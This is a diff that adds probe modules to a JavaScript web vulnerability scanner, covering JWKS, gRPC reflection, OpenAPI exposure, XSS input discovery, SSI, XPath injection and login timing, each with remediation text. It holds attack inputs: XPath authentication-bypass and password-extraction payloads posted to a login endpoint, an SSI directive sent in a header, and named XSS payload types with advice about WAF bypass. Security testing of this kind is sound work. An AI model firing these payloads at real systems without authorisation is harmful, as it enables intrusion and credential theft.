+    if (resp.status === 200 && resp.body.includes('"keys"')) {
+      addFinding('INFO', 'JWT Advanced', 'JWKS endpoint found at /.well-known/jwks.json', 'JWK Set publicly exposed', 'Review JWKS for single key (private key leak risk). Ensure keys are rotated.');
+    }
+  } catch {}
+}
+
+export async function scanGrpc(origin, spinner) {
+  spinner.text = 'Testing gRPC reflection and endpoints...';
+
+  const grpcEndpoints = ['/grpc.reflection.v1alpha.ServerReflection/ServerReflectionInfo',
+    '/grpc.reflection.v1.ServerReflection/ServerReflectionInfo'];
+
+  for (const endpoint of grpcEndpoints) {
+    try {
+      const resp = await fetchText(`${origin}${endpoint}`, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/grpc' },
+      }, 5000);
+
+      if (resp.status === 200 || resp.status === 415 || resp.status === 200) {
+        addFinding('MEDIUM', 'gRPC/OpenAPI', `gRPC reflection endpoint reachable: ${endpoint}`, `Server responded with status ${resp.status}`, 'Disable gRPC reflection in production. Use grpcurl to enumerate exposed services. Add authentication to gRPC endpoints.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanOpenApi(origin, spinner) {
+  spinner.text = 'Fuzzing OpenAPI/Swagger schemas...';
+
+  const openApiPaths = ['/swagger.json', '/swagger.yaml', '/api-docs', '/openapi.json', '/openapi.yaml',
+    '/v1/openapi.json', '/v2/api-docs', '/v3/api-docs', '/api/openapi.json', '/docs/api', '/swagger-ui.html'];
+
+  for (const path of openApiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {}, 5000);
+      if (resp.status === 200 && (resp.body.includes('"openapi"') || resp.body.includes('"swagger"') || resp.body.includes('"paths"') || resp.body.includes('swagger'))) {
+        addFinding('HIGH', 'gRPC/OpenAPI', `OpenAPI/Swagger spec exposed: ${path}`, 'API schema publicly accessible - reveals all endpoints, parameters, and schemas', 'Restrict OpenAPI specs to authenticated internal users. Expose documentation only in dev environment.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanWebrtc(origin, spinner) {
+  spinner.text = 'Testing WebRTC IP leakage...';
+
+  try {
+    const resp = await fetchText(origin);
+    if (resp.body.includes('RTCPeerConnection') || resp.body.includes('webkitRTCPeerConnection') || resp.body.includes('iceServers') || resp.body.includes('stun:') || resp.body.includes('turn:')) {
+      addFinding('LOW', 'Service Worker / WebRTC', 'WebRTC usage detected (IP leak risk)', 'ICE/STUN/TURN servers configured in page', 'WebRTC can leak internal IP addresses even behind VPN/proxy. Use WebRTC block extension or disable in browser settings for anonymity.');
+    } else {
+      addFinding('INFO', 'Service Worker / WebRTC', 'WebRTC IP leak check', 'No WebRTC detected on main page', 'Verify subpages and authenticated sections for WebRTC usage that could leak internal IPs.');
+    }
+  } catch {}
+}
+
+export async function scanStoredDomXss(origin, spinner) {
+  spinner.text = 'Automated stored/DOM XSS with browser...';
+
+  try {
+    const resp = await fetchText(origin);
+    const body = resp.body;
+
+    const inputNames = [];
+    const inputPattern = /<input[^>]*name\s*=\s*['"]([^'"]+)['"]/gi;
+    let match;
+    while ((match = inputPattern.exec(body)) !== null) {
+      inputNames.push(match[1]);
+    }
+
+    const textareaPattern = /<textarea[^>]*name\s*=\s*['"]([^'"]+)['"]/gi;
+    while ((match = textareaPattern.exec(body)) !== null) {
+      inputNames.push(match[1]);
+    }
+
+    const commentFields = inputNames.filter(n => /comment|message|body|content|text|description|bio|about|review|feedback/i.test(n));
+    const searchFields = inputNames.filter(n => /search|query|q|keyword|term/i.test(n));
+
+    if (commentFields.length > 0) {
+      addFinding('MEDIUM', 'Stored/DOM XSS', `Stored XSS target: ${commentFields.length} comment/input fields`, `Fields: ${commentFields.join(', ')} - test with <script>, <img onerror>, <svg/onload> payloads`, 'Submit XSS payloads into these fields, then visit the page where content is rendered without sanitization.');
+    }
+
+    if (inputNames.length > 10) {
+      addFinding('INFO', 'Stored/DOM XSS', `${inputNames.length} input fields discovered for XSS testing`, `All fields: ${inputNames.join(', ').substring(0, 200)}`, 'Use browser-automated tools to inject and verify XSS in all input fields. Check for WAF bypass patterns.');
+    }
+
+    const windowEventPattern = /window\.addEventListener\s*\(\s*['"]message['"]/g;
+    if (windowEventPattern.test(body)) {
+      addFinding('MEDIUM', 'Stored/DOM XSS', 'postMessage listener detected (DOM XSS via messaging)', 'Page has message event listener - test for origin validation bypass', 'Ensure postMessage handler validates event.origin before processing event.data. Never assign untrusted data to innerHTML via postMessage.');
+    }
+
+    const urlHashPattern = /location\.(?:hash|search)\s*(?:=|(?:\+|concat|includes|split|substring))/g;
+    if (urlHashPattern.test(body)) {
+      addFinding('MEDIUM', 'Stored/DOM XSS', 'URL hash/search used in JavaScript (DOM XSS source)', 'URL fragment/search processed in client code', 'Sanitize URL hash/search before using in DOM manipulation. Avoid assigning location.hash to innerHTML.');
+    }
+  } catch {}
+}
+
+export async function scanSsiRemote(origin, spinner) {
+  spinner.text = 'Testing Server-Side Includes (SSI)...';
+  const ssiPaths = ['/index.shtml', '/test.shtml', '/index.stm', '/includes/header.shtml'];
+
+  for (const path of ssiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, { headers: { 'User-Agent': '<!--#echo var="DATE_LOCAL" -->' } }, 5000);
+
+      if (resp.status === 200 && resp.body.length > 0) {
+        if (/<!--#|Server Side Include|SSI/i.test(resp.body) || resp.body.includes('DATE_LOCAL')) {
+          addFinding('MEDIUM', 'XPath / SSI', `SSI endpoint found: ${path}`, `Potential Server-Side Includes at ${origin}${path}`, 'Disable SSI if not needed. If needed, never pass user input to SSI directives.');
+        }
+      }
+    } catch {}
+  }
+}
+
+export async function scanXpathRemote(origin, spinner) {
+  spinner.text = 'Testing XPath injection...';
+
+  const xpathPayloads = [
+    { name: 'Auth bypass', payload: "' or '1'='1", param: 'username' },
+    { name: 'XPath OR injection', payload: "' or 1=1 or 'a'='a", param: 'user' },
+    { name: 'String extraction', payload: "' and string-length(//user[name/text()='admin']/password/text())=4 and '1'='1", param: 'id' },
+  ];
+
+  for (const { name, payload, param } of xpathPayloads) {
+    try {
+      const resp = await fetchText(`${origin}/api/login`, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/xml' },
+        body: `<login><username>${payload}</username><password>test</password></login>`,
+      }, 5000);
+
+      if (resp.status === 200) {
+        addFinding('CRITICAL', 'XPath / SSI', `XPath injection via ${param}: ${name}`, `Payload: ${payload} returned success`, 'Use parameterized XPath queries. Sanitize input against XPath special characters. Consider using JSON/NoSQL instead of XML.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanTimingRemote(origin, spinner) {
+  spinner.text = 'Timing side-channel probe...';
+
+  const validUser = 'admin@target.com';
+  const invalidUser = `nonexistent${Date.now()}@random.com`;
+
+  try {
+    const startValid = Date.now();
+    await fetchText(`${origin}/api/login`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ email: validUser, password: 'wrong' }),
+    }, 8000);
+    const validTime = Date.now() - startValid;
+
+    const startInvalid = Date.now();
+    await fetchText(`${origin}/api/login`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify({ email: invalidUser, password: 'wrong' }),
+    }, 8000);
+    const invalidTime = Date.now() - startInvalid;
+
+    if (Math.abs(validTime - invalidTime) > 200) {
+      addFinding('HIGH', 'Timing Side-Channel', `Timing difference detected: ${Math.abs(validTime - invalidTime)}ms`, `Valid user took ${validTime}ms, invalid took ${invalidTime}ms (difference: ${Math.abs(validTime - invalidTime)}ms)`, 'Use constant-time comparison. Ensure login endpoint responds identically for existing and non-existing users. Add random jitter.');
+    } else {
+      addFinding('INFO', 'Timing Side-Channel', 'Login timing appears consistent', `Valid: ${validTime}ms, Invalid: ${invalidTime}ms (diff: ${Math.abs(validTime - invalidTime)}ms)`, 'Good practice. Continue monitoring for timing differences in other endpoints.');
+    }
+  } catch {}
+}
+
+function btoa(str) {
+  return Buffer.from(str).toString('base64').replace(/=+$/, '').replace(/\+/g, '-').replace(/\//g, '_');
+}